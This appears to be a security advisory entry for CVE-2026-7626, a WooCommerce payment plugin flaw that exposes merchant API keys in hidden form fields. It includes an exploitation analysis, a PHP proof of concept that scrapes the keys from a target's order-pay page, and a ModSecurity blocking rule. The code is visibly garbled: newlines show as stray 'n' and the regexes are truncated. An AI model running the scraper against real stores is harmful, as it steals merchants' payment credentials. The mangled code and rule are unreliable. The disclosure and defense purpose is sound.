CVE-2026-7626: Slek Gateway for WooCommerce <= 1.0 – Unauthenticated Insufficiently Protected Credentials via Payment Redirect Form Hidden Fields (slek-gateway-for-woocommerce)

{
“analysis”: “Atomic Edge analysis of CVE-2026-7626 (metadata-based): This vulnerability exposes the merchant’s Slek API credentials (slek_key and slek_secret) to unauthenticated users during the payment redirect process in the Slek Gateway for WooCommerce plugin version 1.0. The CVSS score is 5.3, indicating medium severity with a network attack vector, low complexity, and no privileges required. The flaw resides in the wsb_handle_slek_payment_redirect() function.nnRoot Cause: Based on the CWE classification (CWE-200: Exposure of Sensitive Information) and the vulnerability description, the root cause is the plugin embedding sensitive API credentials directly into client-side HTML elements. The function generates a payment form with hidden input fields containing the slek_key and slek_secret, which any unauthenticated user can view by inspecting the page source or using browser DevTools. Additionally, the slek_secret is exposed as a plaintext GET parameter in the IPN callback URL within the same form. Atomic Edge research infers this pattern because the description explicitly states the credentials are placed in a client-side form and the IPN URL. No code diff is available to confirm the exact implementation, but the described behavior matches a common anti-pattern where developers mistakenly treat hidden form fields as secure.nnExploitation: An attacker can exploit this vulnerability without authentication by placing an order on a WooCommerce store using this gateway. After placing the order, the attacker navigates to the WooCommerce order-pay page (typically /checkout/order-pay/{order_id}/). Before the JavaScript auto-submit fires, they can view the HTML source of the page or use browser DevTools to inspect the hidden fields in the payment redirect form. The attacker extracts the slek_key and slek_secret values from those fields. No special tools are required; only a standard web browser.nnRemediation: The plugin developer must refactor the payment redirect handling to never expose API credentials to the client. The correct approach is to store the slek_key and slek_secret server-side (e.g., in an options table or environment variables) and use a server-to-server implementation for communication with the Slek payment gateway. The IPN callback URL should use a randomly generated, one-time token tied to the current order, not the static secret. Alternatively, if redirect-based payment is required, the plugin should use a server-side proxy that generates a temporary nonce or session-based identifier for the client-side form, keeping the actual credentials on the server.nnImpact: Successful exploitation allows an unauthenticated attacker to obtain the merchant’s Slek API credentials. With these credentials, the attacker can potentially impersonate the merchant in Slek API calls, initiate unauthorized refunds, modify payment settings, or extract transaction data. This could lead to financial theft, data breaches, and loss of merchant trust. The impact is limited to a single CVSS confidentiality metric of “none” but integrity impact of “low” because the attacker can modify transactions or settings using the stolen credentials.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-7626 – Slek Gateway for WooCommerce <= 1.0 – Unauthenticated Insufficiently Protected Credentials via Payment Redirect Form Hidden Fieldsnn// This PoC demonstrates how an unauthenticated attacker can extract the merchant'sn// slek_key and slek_secret by viewing the HTML source of the order-pay page.n// It assumes the attacker has a valid order ID after placing an order.nn// Configuration: change these values as neededn$target_url = 'http://example.com'; // Base URL of the vulnerable WordPress siten$order_id = 1234; // WooCommerce Order ID (obtained after placing an order)nn// Construct the order-pay URLn$order_pay_url = rtrim($target_url, '/') . '/checkout/order-pay/' . $order_id . '/';nn// Initialize cURLn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $order_pay_url);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);ncurl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');nn// Execute the requestn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nnif ($http_code !== 200) {n die("[ERROR] Failed to fetch order-pay page. HTTP code: $http_code\n");n}nn// Extract the slek_key and slek_secret from hidden form fieldsn// The form likely contains something like:n// n// n// We also look for the IPN callback URL containing slek_secret as a GET parameter.nn$slek_key = ”;n$slek_secret = ”;n$ipn_url = ”;nn// Pattern to find slek_key in hidden inputnif (preg_match(‘/]*name=[“\’]slek_key[“\’][^>]*value=[“\’]([^”\’]+)[“\’][^>]*>/i’, $response, $matches)) {n $slek_key = $matches[1];n}nn// Pattern to find slek_secret in hidden inputnif (preg_match(‘/]*name=[“\’]slek_secret[“\’][^>]*value=[“\’]([^”\’]+)[“\’][^>]*>/i’, $response, $matches)) {n $slek_secret = $matches[1];n}nn// Pattern to find the IPN callback URL (may contain slek_secret as GET param)n// The form action or a hidden input may point to an IPN URL like:n// https://slek.example.com/ipn?slek_secret=…nif (preg_match(‘/]*action=[“\’]([^”\’]+slek[^”\’]*)[“\’][^>]*>/i’, $response, $matches)) {n $ipn_url = $matches[1];n // Extract slek_secret from the URL if presentn parse_str(parse_url($ipn_url, PHP_URL_QUERY), $params);n if (isset($params[‘slek_secret’])) {n if (empty($slek_secret)) {n $slek_secret = $params[‘slek_secret’];n }n }n}nn// Output the extracted credentialsnif (!empty($slek_key) || !empty($slek_secret)) {n echo “[SUCCESS] Extracted Slek API credentials from order ID: $order_id\n”;n if (!empty($slek_key)) {n echo ” slek_key: $slek_key\n”;n } else {n echo ” [WARNING] slek_key not found in page source.\n”;n }n if (!empty($slek_secret)) {n echo ” slek_secret: $slek_secret\n”;n } else {n echo ” [WARNING] slek_secret not found in page source.\n”;n }n if (!empty($ipn_url)) {n echo ” IPN URL: $ipn_url\n”;n }n} else {n echo “[INFO] No Slek credentials found on the order-pay page.\n”;n echo “The plugin may not have rendered the payment form yet, or the page structure differs.\n”;n echo “Try using browser DevTools to manually inspect the page source.\n”;n}n?>n”,
“modsecurity_rule”: “SecRule REQUEST_URI “@rx ^/checkout/order-pay/\d+/$” \n “id:20267626,phase:2,deny,status:403,chain,msg:’CVE-2026-7626 via Slek Gateway payment form hidden fields’,severity:’CRITICAL’,tag:’CVE-2026-7626′”n SecRule REQUEST_METHOD “@streq GET” “chain”n SecRule RESPONSE_BODY “@rx ]*name=[“\’](slek_key|slek_secret)[“\’][^>]*value=[“\’][^”\’]+[“\’][^>]*>” \n “id:20267627,phase:4,deny,status:403,msg:’CVE-2026-7626 – Slek credentials exposed in HTML’,severity:’CRITICAL’,tag:’CVE-2026-7626′””
}